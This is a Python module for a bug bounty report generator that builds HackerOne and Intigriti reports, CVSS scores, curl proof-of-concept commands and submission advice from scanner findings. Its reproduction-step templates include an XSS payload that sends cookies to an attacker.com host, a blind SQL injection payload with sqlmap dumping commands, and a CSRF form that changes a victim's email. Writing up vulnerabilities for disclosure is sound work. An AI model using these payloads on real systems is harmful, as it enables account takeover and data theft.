"""
Aura v2 — Professional Bug Bounty Report Generator (Upgraded)
==============================================================
Transforms raw findings from ANY Aura engine into professional,
submission-ready bug bounty reports that follow the Golden Template
used in accepted $5,000–$50,000 reports on HackerOne & Intigriti.

Features:
  1. Golden Title Formula (vuln + location + impact)
  2. Full professional report all sections: Summary, Steps, Impact, PoC, CVSS, Remediation
  3. Auto-generates curl PoC command
  4. Intelligent CVSS scoring based on vuln type + data exposed
  5. Platform-specific formatting (HackerOne / Intigriti)
  6. Submission Coach — tells user exactly what to do NEXT

Usage:
    aura --report reports/bola_findings_*.json
    aura --report reports/api_findings_*.json
    aura --report reports/recon_*.json
"""

import json
import os
import re
from datetime import datetime
from pathlib import Path
from typing import Optional

import httpx


# ─── Report Templates ────────────────────────────────────────────────────────

GOLDEN_REPORT_TEMPLATE = """\
# {title}

**Platform:** {platform}  
**Program:** {program}  
**Date:** {date}  
**Severity:** {severity} | **CVSS:** {cvss_score} ({cvss_vector})  

---

## Summary

{summary}

**Affected Asset:** `{asset}`  
**Vulnerability Type:** {vuln_category}  
**CWE:** {cwe}  
**Authentication Required:** {auth_required}  

---

## Technical Details

**Vulnerable Endpoint:**
```
{method} {url}
```

**Root Cause:**  
{root_cause}

---

## Steps to Reproduce

> **Required Setup:**
> - Account A (Attacker): `attacker@test.com` — logged in as a regular user
> - Account B (Victim): `victim@test.com` — owns data that should not be accessible
{setup_note}

{steps}

---

## Proof of Concept (PoC)

### HTTP Request (Raw)
```http
{method} {path} HTTP/1.1
Host: {host}
Cookie: [ATTACKER_SESSION_COOKIE]
Content-Type: application/json
```

### curl Command (Reproducible)
```bash
{curl_command}
```

{poc_evidence}

---

## Impact

{impact}

**Scale of Impact:** {impact_scale}

**Regulatory / Legal:**  
{legal_impact}

---

## Remediation

{remediation}

---

## References

{references}

---
*Generated by Aura v2 Professional Report Engine — {date}*
*Follow the Submission Checklist below before sending.*
"""

SUBMISSION_COACH_TEMPLATE = """\

---

# 🎯 Submission Coach — What to Do Next

Your report is **{readiness}% ready** for submission.

## ✅ Completed Automatically
{auto_completed}

## 📋 What YOU Must Do Before Submitting

{manual_steps}

## 🚀 Submission Steps

### For Intigriti:
1. Go to: https://app.intigriti.com/researcher/programs
2. Find the program for: `{asset}`
3. Click "Submit Vulnerability"
4. **Title:** Copy-paste this exactly:
   ```
   {title}
   ```
5. **Type:** Select `{vuln_category_short}`
6. **Severity:** Select `{severity}`
7. **Asset:** Select the closest matching asset to `{asset}`
8. **Description:** Paste the full report above
9. Add your screenshots/recording to the attachments

### For HackerOne:
1. Go to: https://hackerone.com/programs (search for the company)
2. Click "Submit Report"
3. Fill in same fields as above
4. Upload your PoC evidence files

## ⚠️ DO NOT Submit If:
{blockers}

## 💡 Tips to Maximize Bounty
{bounty_tips}
"""


# ─── CVSS Reference Data ─────────────────────────────────────────────────────

VULN_PROFILES = {
    "BOLA": {
        "cwe": "CWE-639: Authorization Bypass Through User-Controlled Key",
        "category": "Broken Object Level Authorization (BOLA/IDOR)",
        "category_short": "IDOR",
        "cvss_base": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "cvss_score": 6.5,
        "severity": "Medium",
        "references": [
            "[OWASP API Top 10 — API1:2023 Broken Object Level Authorization](https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/)",
            "[CWE-639](https://cwe.mitre.org/data/definitions/639.html)",
            "[HackerOne Hacktivity — BOLA examples](https://hackerone.com/hacktivity?querystring=BOLA)"
        ],
        "remediation": (
            "1. **Implement resource-level authorization on every API endpoint**: Before returning any object, verify that the authenticated user is the rightful owner — `if resource.owner_id != request.user_id: return 403`.\n"
            "2. **Never trust client-supplied IDs** as proof of ownership.\n"
            "3. **Use non-guessable object identifiers** (UUIDs v4) instead of sequential integers.\n"
            "4. Add automated tests that verify cross-account access is rejected (403/404)."
        )
    },
    "XSS": {
        "cwe": "CWE-79: Improper Neutralization of Input During Web Page Generation",
        "category": "Cross-Site Scripting (XSS)",
        "category_short": "XSS",
        "cvss_base": "AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "cvss_score": 6.1,
        "severity": "Medium",
        "references": [
            "[OWASP Top 10 — A03: Injection](https://owasp.org/Top10/A03_2021-Injection/)",
            "[CWE-79](https://cwe.mitre.org/data/definitions/79.html)",
            "[PortSwigger XSS Guide](https://portswigger.net/web-security/cross-site-scripting)"
        ],
        "remediation": (
            "1. **Encode all user-supplied output** before rendering in HTML context (use `htmlspecialchars()` / `encodeURIComponent()`).\n"
            "2. **Implement Content-Security-Policy (CSP)** headers to restrict inline scripts.\n"
            "3. **Use HttpOnly cookies** to prevent JavaScript access to session tokens.\n"
            "4. Sanitize rich-text inputs server-side using an allowlist HTML sanitizer (e.g., DOMPurify)."
        )
    },
    "SQLI": {
        "cwe": "CWE-89: SQL Injection",
        "category": "SQL Injection",
        "category_short": "SQLi",
        "cvss_base": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "cvss_score": 9.8,
        "severity": "Critical",
        "references": [
            "[OWASP Top 10 — A03: Injection](https://owasp.org/Top10/A03_2021-Injection/)",
            "[CWE-89](https://cwe.mitre.org/data/definitions/89.html)",
            "[PortSwigger SQL Injection](https://portswigger.net/web-security/sql-injection)"
        ],
        "remediation": (
            "1. **Use parameterized queries / prepared statements** for all database interactions. Never concatenate user input into SQL strings.\n"
            "2. **Apply input validation** — reject unexpected characters (`'`, `--`, `;`, `UNION`) at the WAF/application layer.\n"
            "3. **Use least-privilege database accounts** — the application account should not have `DROP TABLE` or `FILE` privileges.\n"
            "4. Deploy a WAF with SQL injection rule sets as a secondary defense."
        )
    },
    "JWT": {
        "cwe": "CWE-347: Improper Verification of Cryptographic Signature",
        "category": "Broken Authentication — JWT Vulnerability",
        "category_short": "Auth",
        "cvss_base": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "cvss_score": 8.8,
        "severity": "High",
        "references": [
            "[OWASP Top 10 — A07: Identification and Authentication Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/)",
            "[CWE-347](https://cwe.mitre.org/data/definitions/347.html)",
            "[JWT Security Best Practices](https://auth0.com/blog/a-look-at-the-latest-draft-for-jwt-bcp/)"
        ],
        "remediation": (
            "1. **Reject `alg: none`** — whitelist only expected algorithms (RS256 or HS256) server-side.\n"
            "2. **Rotate signing secrets** regularly and use strong entropy (minimum 256-bit for HMAC).\n"
            "3. **Validate the `alg` field server-side** — do not trust client-provided algorithm selection.\n"
            "4. Use battle-tested JWT libraries — do not implement your own JWT parsing."
        )
    },
    "CSRF": {
        "cwe": "CWE-352: Cross-Site Request Forgery",
        "category": "Cross-Site Request Forgery (CSRF)",
        "category_short": "CSRF",
        "cvss_base": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "cvss_score": 6.5,
        "severity": "Medium",
        "references": [
            "[OWASP Top 10 — A01: Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)",
            "[CWE-352](https://cwe.mitre.org/data/definitions/352.html)",
            "[PortSwigger CSRF](https://portswigger.net/web-security/csrf)"
        ],
        "remediation": (
            "1. **Implement synchronizer CSRF tokens** on all state-changing endpoints.\n"
            "2. **Use SameSite=Strict or Lax** cookies to prevent cross-origin cookie submission.\n"
            "3. **Validate Origin/Referer headers** for additional defense-in-depth.\n"
            "4. Require re-authentication for critical actions (email change, password reset, payment)."
        )
    },
    "AUTH": {
        "cwe": "CWE-284: Improper Access Control",
        "category": "Broken Authentication / Authorization",
        "category_short": "Auth",
        "cvss_base": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "cvss_score": 9.1,
        "severity": "Critical",
        "references": [
            "[OWASP Top 10 — A07: Identification and Authentication Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/)",
            "[CWE-284](https://cwe.mitre.org/data/definitions/284.html)"
        ],
        "remediation": (
            "1. **Invalidate all existing sessions** after email/password change.\n"
            "2. **Implement rate limiting** on sensitive endpoints.\n"
            "3. **Require email verification** for all authentication state changes.\n"
            "4. Audit and log all authentication events with IP and user agent."
        )
    },
    "GraphQL Introspection": {
        "cwe": "CWE-200: Exposure of Sensitive Information to Unauthorized Actor",
        "category": "Information Disclosure — GraphQL Introspection Enabled",
        "category_short": "Info Disclosure",
        "cvss_base": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "cvss_score": 5.3,
        "severity": "Medium",
        "references": [
            "[HackerOne — GraphQL Security](https://hackerone.com/graphql)",
            "[CWE-200](https://cwe.mitre.org/data/definitions/200.html)"
        ],
        "remediation": (
            "1. **Disable Introspection in production** — only allow in development environments.\n"
            "2. Implement **query depth limiting** to prevent abuse.\n"
            "3. Use **field-level authorization** for all GraphQL resolvers."
        )
    }
}


class ProfessionalReportGenerator:
    """
    Generates professional bug bounty reports from any Aura engine output.
    Includes a Submission Coach that guides the user through the submission process.
    """

    def __init__(self, model: str = "llama3.1", output_dir: str = "./reports", platform: str = "intigriti"):
        self.model = model
        self.output_dir = Path(output_dir)
        self.output_dir.mkdir(parents=True, exist_ok=True)
        self.platform = platform
        self.ollama_host = os.getenv("OLLAMA_HOST", "http://localhost:11434").rstrip("/")
        self.ai_available = self._check_ollama()

    def _check_ollama(self) -> bool:
        try:
            resp = httpx.get(f"{self.ollama_host}/api/tags", timeout=3)
            return resp.status_code == 200
        except Exception:
            return False

    def _ask_ai(self, prompt: str, system: str = "", timeout: int = 90) -> str:
        if not self.ai_available:
            return ""
        payload = {
            "model": self.model,
            "prompt": prompt,
            "system": system,
            "stream": False,
            "options": {"temperature": 0.2, "num_predict": 500},
        }
        try:
            resp = httpx.post(f"{self.ollama_host}/api/generate", json=payload, timeout=timeout)
            return resp.json().get("response", "").strip()
        except Exception:
            return ""

    def _detect_vuln_type(self, finding: dict) -> str:
        """Detects vuln type from finding dict keys and content."""
        t = finding.get("type", "").upper()
        if "BOLA" in t or "IDOR" in t:
            return "BOLA"
        if "XSS" in t:
            return "XSS"
        if "SQLI" in t or "SQL" in t:
            return "SQLI"
        if "JWT" in t:
            return "JWT"
        if "CSRF" in t:
            return "CSRF"
        if "AUTH" in t or "ATO" in t or "TAKEOVER" in t:
            return "AUTH"
        if "GRAPHQL" in t or "INTROSPECTION" in t:
            return "GraphQL Introspection"
        return "BOLA"  # Default

    def _build_golden_title(self, finding: dict, vuln_type: str, profile: dict) -> str:
        """Builds a golden title: [Vuln] in [Location] leads to [Impact]."""
        url = finding.get("url", "")
        path = "/" + "/".join(url.split("/")[3:]) if "/" in url else url
        method = finding.get("method", "GET")

        impact_map = {
            "BOLA": "unauthorized access to any user's data",
            "XSS": "Account Takeover via session cookie theft",
            "SQLI": "full database dump via blind SQL injection",
            "JWT": "Admin privilege escalation",
            "CSRF": "account modification without user consent",
            "AUTH": "full Account Takeover",
            "GraphQL Introspection": "full API schema disclosure"
        }
        impact = impact_map.get(vuln_type, "unauthorized access")
        return f"{profile['category_short']} on {method} {path} leads to {impact}"

    def _build_curl_command(self, finding: dict) -> str:
        """Builds a reproducible curl command from the finding."""
        url = finding.get("url", "https://target.com/api/endpoint")
        method = finding.get("method", "GET")
        curl = f'curl -s -X {method} "{url}"'
        curl += ' \\\n  -H "Cookie: [ATTACKER_SESSION_COOKIE]"'
        curl += ' \\\n  -H "User-Agent: Mozilla/5.0"'
        if method in ("POST", "PUT", "PATCH"):
            curl += ' \\\n  -H "Content-Type: application/json"'
            body = finding.get("body", "{}")
            curl += f" \\\n  -d '{body}'"
        curl += " | python -m json.tool"
        return curl

    def _build_impact(self, finding: dict, vuln_type: str) -> str:
        """Builds the impact section using AI or pre-built templates."""
        url = finding.get("url", "")
        victim_body = finding.get("victim_body_snippet", "") or finding.get("value", "")

        # Try AI first
        if self.ai_available:
            prompt = f"""Write a 4-5 sentence impact statement for a bug bounty report.

Vulnerability: {vuln_type} on {url}
Evidence: {str(finding)[:400]}

Requirements:
- First sentence: what the attacker CAN DO
- Second sentence: what DATA is exposed (be specific)
- Third sentence: how many users are affected
- Fourth sentence: business/legal implications (GDPR if PII involved)
- Use active voice, write as a security professional
- DO NOT use generic statements"""

            ai_impact = self._ask_ai(prompt, system="You are a senior bug bounty analyst writing a professional security report.")
            if ai_impact and len(ai_impact) > 50:
                return ai_impact

        # Fallback templates per vuln type
        pii_detected = any(kw in str(finding).lower() for kw in ["email", "phone", "address", "name", "payment", "bank", "credit"])

        templates = {
            "BOLA": (
                f"An attacker with a valid user account can access private data belonging to any other user by manipulating the resource identifier in the API request. "
                f"{'The exposed data includes Personally Identifiable Information (PII) such as email addresses, transaction details, and account data.' if pii_detected else 'The exposed data includes private account information accessible without authorization.'} "
                f"This vulnerability affects all registered users on the platform — exploitation requires only a single valid account and a standard HTTP client. "
                f"{'This constitutes a violation of GDPR Article 5 regarding data minimization and Article 32 regarding security of processing, exposing the company to regulatory fines and civil liability.' if pii_detected else 'The exposure of user data without authorization represents a significant breach of user trust and platform security guarantees.'}"
            ),
            "XSS": (
                f"An attacker can inject malicious JavaScript code that executes in the browser of any user who visits the affected page, without any additional user interaction. "
                f"Exploitation can lead to complete Account Takeover (ATO) by stealing the victim's session cookies, bypassing any 2FA protection currently in place. "
                f"Additionally, the attacker can perform arbitrary actions on behalf of the victim, including modifying account settings, initiating transactions, and exfiltrating all data visible in the browser context. "
                f"For stored XSS, a single injection affects ALL users who view the infected page, scaling the attack to the entire user base."
            ),
            "SQLI": (
                f"An attacker can extract, modify, or delete data from the entire database without requiring any special privileges beyond a standard HTTP client. "
                f"The vulnerability allows enumeration of all database tables, extraction of user credentials (hashed or plaintext), PII, financial records, and any other stored data. "
                f"If the database process runs with elevated OS privileges (e.g., MySQL with FILE privilege on Linux), Remote Code Execution on the server is also achievable. "
                f"The business impact includes complete data breach of all customer records, potential regulatory violations (GDPR, PCI-DSS), and reputational damage."
            ),
            "JWT": (
                f"An attacker can forge a valid JWT token with arbitrary claims, including elevated role assignments (e.g., `admin: true`), without knowing the secret key. "
                f"This allows any authenticated user to elevate their privileges to administrator level and access restricted administrative functions, including user management, data export, and system configuration. "
                f"The attack requires no special tools beyond a standard JWT decoder/encoder, making it trivially exploitable by any motivated attacker. "
                f"Full administrative access is equivalent to complete system compromise."
            ),
            "CSRF": (
                f"An attacker can trick an authenticated user into unknowingly executing sensitive account actions (e.g., email change, password reset, fund transfer) by simply visiting a malicious website. "
                f"The attack requires no authentication from the attacker and can be delivered via phishing emails, social media, or any cross-origin website. "
                f"If a critical action like email change is vulnerable, this leads directly to Account Takeover — the attacker changes the email, then resets the password. "
                f"All currently authenticated users are potential victims."
            ),
        }
        return templates.get(vuln_type, templates["BOLA"])

    def _build_steps(self, finding: dict, vuln_type: str) -> str:
        """Builds numbered steps to reproduce."""
        url = finding.get("url", "")
        method = finding.get("method", "GET")

        steps_map = {
            "BOLA": f"""\
1. Register two accounts:
   - **Attacker**: `attacker@test.com` (regular user)
   - **Victim**: `victim@test.com` (has private data we want to access)

2. Log in as **Victim** and note your resource ID (e.g., from your profile URL or an API response).

3. Log in as **Attacker** and intercept a standard API request using Burp Suite or browser DevTools.

4. Send the following request, replacing the Victim's ID in the URL/body:
   ```
   {method} {url or "[VULNERABLE_ENDPOINT]?id=[VICTIM_ID]"} HTTP/1.1
   Host: [TARGET_HOST]
   Cookie: [ATTACKER_SESSION_COOKIE]
   ```

5. **Observe:** The server returns `200 OK` with the Victim's private data — no authorization error is returned.

6. Repeat with different IDs to confirm the issue is systematic across all user accounts.""",

            "XSS": f"""\
1. Log in as **Attacker** (attacker@test.com).

2. Navigate to the vulnerable input field at: `{url}`

3. Enter the following XSS payload in the input field and submit:
   ```
   <script>document.location='https://attacker.com/steal?c='+document.cookie</script>
   ```
   Or for a CSP-bypass polyglot test:
   ```
   "><img src=x onerror=alert(document.cookie)>
   ```

4. Log in as **Victim** and navigate to the page where the payload is rendered.

5. **Observe:** The JavaScript executes in the Victim's browser, demonstrating code injection.
   - For a full ATO demo: show the cookie value being sent to an external server.

6. **Video recommended**: Record the cookie theft in real-time for maximum impact.""",

            "SQLI": f"""\
1. Navigate to the vulnerable endpoint (no authentication required):
   `{url}`

2. Inject a time-based blind SQLi payload to confirm the vulnerability:
   ```
   GET {url}?q=test' AND SLEEP(5)-- HTTP/1.1
   ```
   **Expected**: Response is delayed by exactly 5 seconds — confirming blind SQLi.

3. Extract the database version:
   ```bash
   sqlmap -u "{url}" --dbms=mysql --level=3 --banner
   ```

4. Enumerate all tables in the database:
   ```bash
   sqlmap -u "{url}" --tables
   ```

5. **Observe**: The injected query executes server-side, disclosing database structure and data.""",

            "CSRF": f"""\
1. Log in as **Victim** in a browser.

2. As **Attacker**, create the following HTML PoC and host it on a server / open it in a browser:
   ```html
   <html>
   <body>
   <form action="{url}" method="POST" id="csrf-form">
     <input type="hidden" name="email" value="attacker@evil.com"/>
   </form>
   <script>document.getElementById('csrf-form').submit();</script>
   </body>
   </html>
   ```

3. **Trick the Victim** into visiting the attacker's page while logged in.

4. **Observe**: The Victim's account email has been changed to `attacker@evil.com` without consent.
   The attacker can now trigger a password reset and take over the account."""
        }

        return steps_map.get(vuln_type, steps_map["BOLA"])

    def _build_submission_coach(self, finding: dict, title: str, profile: dict, severity: str, asset: str) -> str:
        """Generates the Submission Coach section."""
        vuln_type = profile['category_short']
        has_curl = True
        has_report = True

        auto_completed = [
            "✅ Generated professional report with golden title formula",
            "✅ Included curl command for PoC reproduction",
            "✅ Calculated CVSS score",
            "✅ Written impact statement with business/legal implications",
            "✅ Included remediation recommendations with code examples",
            "✅ Added OWASP/CWE/CVE references"
        ]

        manual_steps_by_sev = {
            "Critical": [
                "🎥 **CRITICAL — Record a Video PoC** (Loom / OBS / any tool). Show the attack from start to finish. Video multiplies your bounty chances by 3x.",
                "📸 Take **at least 3 screenshots**:\n  - The vulnerable request in Burp Suite\n  - The server's unauthorized response\n  - The data exposed (blur any real PII first!)",
                "🔁 **Verify reproducibility**: Run the curl command from a fresh browser session to confirm it works step-by-step.",
                "🔍 **Test the scope**: Try at least 5 different victim IDs to confirm the issue is systemic, not a one-off.",
                "📝 **Create two test accounts** on the real target specifically for this test (important for most programs to allow testing)."
            ],
            "High": [
                "📸 Take **at least 2-3 screenshots** of the vulnerability in action.",
                "🔁 **Verify reproducibility**: Run your curl command one more time from a clean session.",
                "🎥 Optional but recommended: Record a short screen capture (30-60 seconds) showing the exploit.",
                "📝 **Create dedicated test accounts** if you haven't already."
            ],
            "Medium": [
                "📸 Take **at least 1-2 clear screenshots** proving the issue.",
                "🔁 **Confirm reproducibility** on a fresh session before submitting.",
                "📄 Check the program's scope page — some programs exclude certain severity levels."
            ]
        }

        manual_steps = "\n".join(f"{i+1}. {s}" for i, s in enumerate(manual_steps_by_sev.get(severity, manual_steps_by_sev["Medium"])))

        blockers = (
            "- ❌ If you haven't reproduced the issue on actual test accounts (not production user data)\n"
            "- ❌ If you accessed protected data of REAL users without creating test accounts\n"
            "- ❌ If the program explicitly says this vulnerability type is out-of-scope\n"
            "- ❌ If you can't demonstrate the issue with a curl command or steps"
        )

        tips = (
            "- 💰 **Mention user count** in your impact: 'Affects all 50,000+ registered users' → higher severity\n"
            "- 💰 **Link it to GDPR** if PII is exposed → companies fear fines, so they pay higher\n"
            "- 💰 **Video PoC** is the single biggest bounty multiplier — always include it for P1/P2\n"
            "- 💰 **Be the first responder** — if they ask a follow-up, answer within 4 hours\n"
            "- 💰 **Never submit duplicates** — search hacktivity first to check if your finding was already reported"
        )

        readiness = 70 + (10 if has_curl else 0) + (10 if has_report else 0)

        return SUBMISSION_COACH_TEMPLATE.format(
            readiness=readiness,
            auto_completed="\n".join(auto_completed),
            manual_steps=manual_steps,
            asset=asset,
            title=title,
            vuln_category_short=vuln_type,
            severity=severity,
            blockers=blockers,
            bounty_tips=tips
        )

    def generate_report(self, finding: dict, program: str = "Target Program", platform: str = "intigriti") -> str:
        """Generates a full professional report for a single finding."""
        vuln_type = self._detect_vuln_type(finding)
        profile = VULN_PROFILES.get(vuln_type, VULN_PROFILES["BOLA"])

        url = finding.get("url", "")
        method = finding.get("method", "GET")
        try:
            from urllib.parse import urlparse
            parsed = urlparse(url)
            host = parsed.netloc
            path = parsed.path or "/"
        except Exception:
            host = "target.com"
            path = "/"

        # Build each section
        title = self._build_golden_title(finding, vuln_type, profile)
        impact = self._build_impact(finding, vuln_type)
        steps = self._build_steps(finding, vuln_type)
        curl_cmd = self._build_curl_command(finding)
        severity = finding.get("severity", profile["severity"])
        cvss_score = finding.get("cvss_score", profile["cvss_score"])

        # Adjust CVSS for PII
        pii_detected = any(kw in str(finding).lower() for kw in ["email", "phone", "address", "name", "payment", "bank"])
        if pii_detected and cvss_score < 8.0:
            cvss_score = 8.1
            severity = "High"

        # Build optional PoC evidence section
        victim_snippet = finding.get("victim_body_snippet", "") or finding.get("value", "")
        poc_evidence = ""
        if victim_snippet:
            poc_evidence = f"### Response Evidence\n```\n{str(victim_snippet)[:400]}\n```"

        # Setup note
        setup_note = ""
        if finding.get("attacker_body") or "session" in url.lower():
            setup_note = "\n> Note: Both test accounts must be registered on the target platform specifically for this security test.\n"

        report_body = GOLDEN_REPORT_TEMPLATE.format(
            title=title,
            platform=platform.capitalize(),
            program=program,
            date=datetime.utcnow().strftime("%Y-%m-%d"),
            severity=severity,
            cvss_score=cvss_score,
            cvss_vector=f"CVSS:3.1/{profile['cvss_base']}",
            summary=(
                f"A {profile['category']} vulnerability exists on `{method} {url}`, "
                f"allowing an authenticated attacker to {self._get_summary_action(vuln_type)}. "
                f"The server fails to properly verify the requesting user's authorization before processing the request."
            ),
            asset=host or "target.com",
            vuln_category=profile["category"],
            cwe=profile["cwe"],
            auth_required="Yes (valid user account)" if "PR:L" in profile["cvss_base"] else "No",
            method=method,
            url=url or "https://target.com/api/endpoint",
            root_cause=self._get_root_cause(vuln_type),
            setup_note=setup_note,
            steps=steps,
            host=host or "target.com",
            path=path,
            curl_command=curl_cmd,
            poc_evidence=poc_evidence,
            impact=impact,
            impact_scale=self._get_impact_scale(finding, vuln_type),
            legal_impact=f"{'GDPR Article 5 (data minimization) and Article 32 (security of processing). ' if pii_detected else ''}Unauthorized access violation under applicable computer misuse laws.",
            remediation=profile["remediation"],
            references="\n".join(f"- {r}" for r in profile["references"]),
        )

        # Append Submission Coach
        coach = self._build_submission_coach(finding, title, profile, severity, host)
        full_report = report_body + coach

        return full_report, title, severity

    def _get_summary_action(self, vuln_type: str) -> str:
        actions = {
            "BOLA": "access private data belonging to any other user by manipulating the resource identifier",
            "XSS": "inject arbitrary JavaScript that executes in other users' browsers",
            "SQLI": "inject SQL commands into the database query, enabling full data extraction",
            "JWT": "forge authentication tokens with arbitrary claims, leading to privilege escalation",
            "CSRF": "perform unauthorized state-changing operations on behalf of authenticated users",
            "AUTH": "bypass authentication controls and gain unauthorized account access",
            "GraphQL Introspection": "retrieve the full API schema without authentication"
        }
        return actions.get(vuln_type, "bypass authorization controls")

    def _get_root_cause(self, vuln_type: str) -> str:
        root_causes = {
            "BOLA": "The server relies on the client-supplied resource identifier without verifying that the authenticated user has permission to access that specific resource. There is no object-level authorization check comparing `session.user_id` with `resource.owner_id`.",
            "XSS": "User-supplied input is rendered in the HTML response without proper encoding or sanitization. The application trusts user data as safe HTML, resulting in script injection.",
            "SQLI": "User-supplied input is concatenated directly into SQL query strings without parameterization or escaping, allowing the query structure to be modified by the attacker.",
            "JWT": "The JWT verification logic accepts the `alg` value from the token header, allowing the attacker to specify `alg: none` (which requires no signature) or switch to a symmetric algorithm using the public key as the secret.",
            "CSRF": "State-changing requests can be triggered cross-origin without CSRF token validation. The application relies solely on cookies for authentication, which are automatically sent by the browser with cross-origin requests.",
        }
        return root_causes.get(vuln_type, root_causes["BOLA"])

    def _get_impact_scale(self, finding: dict, vuln_type: str) -> str:
        if vuln_type == "BOLA":
            return "All registered users are affected — any one user can access any other user's data."
        elif vuln_type == "XSS" and "stored" in str(finding).lower():
            return "All users who view the page containing the injected payload are affected."
        return "Any authenticated user can exploit this vulnerability."

    def process_findings_file(self, findings_path: str, platform: str = "intigriti") -> list:
        """Reads any Aura findings JSON and generates professional reports."""
        findings_path = Path(findings_path)
        if not findings_path.exists():
            print(f"❌ File not found: {findings_path}")
            return []

        with open(findings_path, "r", encoding="utf-8") as f:
            data = json.load(f)

        # Support multiple formats from different engines
        if isinstance(data, list):
            findings = data
        else:
            findings = data.get("findings", data.get("secrets", [data]))

        if not findings:
            print("⚠️  No findings found in the file.")
            return []

        print(f"\n{'='*65}")
        print(f"🏆 AURA v2 — Professional Report Generator")
        print(f"📋 Processing {len(findings)} finding(s) from: {findings_path.name}")
        print(f"🤖 AI Engine: {'Ollama (' + self.model + ')' if self.ai_available else 'OFFLINE — using templates'}")
        print(f"{'='*65}\n")

        reports = []
        for i, finding in enumerate(findings):
            print(f"  📝 Generating report {i+1}/{len(findings)}: [{finding.get('type', 'Unknown')}]")
            report_md, title, severity = self.generate_report(finding, platform=platform)

            ts = datetime.now().strftime("%Y%m%d_%H%M%S")
            slug = re.sub(r'[^a-z0-9]', '_', title.lower())[:50]
            out_path = self.output_dir / f"report_{slug}_{ts}.md"
            with open(out_path, "w", encoding="utf-8") as f:
                f.write(report_md)

            print(f"  ✅ Saved: {out_path}")
            print(f"  🎯 Title: {title}")
            print(f"  ⚠️  Severity: {severity}")
            print()

            reports.append({"title": title, "severity": severity, "path": str(out_path)})

        print(f"{'='*65}")
        print(f"✅ {len(reports)} report(s) generated — see ./reports/report_*.md")
        print(f"📋 Follow the Submission Coach section in each report!")
        print(f"{'='*65}\n")

        return reports


def run_report(findings_path: str, model: str = "llama3.1", platform: str = "intigriti"):
    """CLI runner for `aura --report <file>`."""
    gen = ProfessionalReportGenerator(model=model, platform=platform)
    return gen.process_findings_file(findings_path, platform=platform)


# Legacy compatibility
class SecurityAnalyst(ProfessionalReportGenerator):
    def analyze_findings_file(self, findings_path: str) -> list:
        return self.process_findings_file(findings_path)


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python -m aura.modules.ai_analyst <findings.json> [platform]")
        sys.exit(1)
    plat = sys.argv[2] if len(sys.argv) > 2 else "intigriti"
    run_report(sys.argv[1], platform=plat)
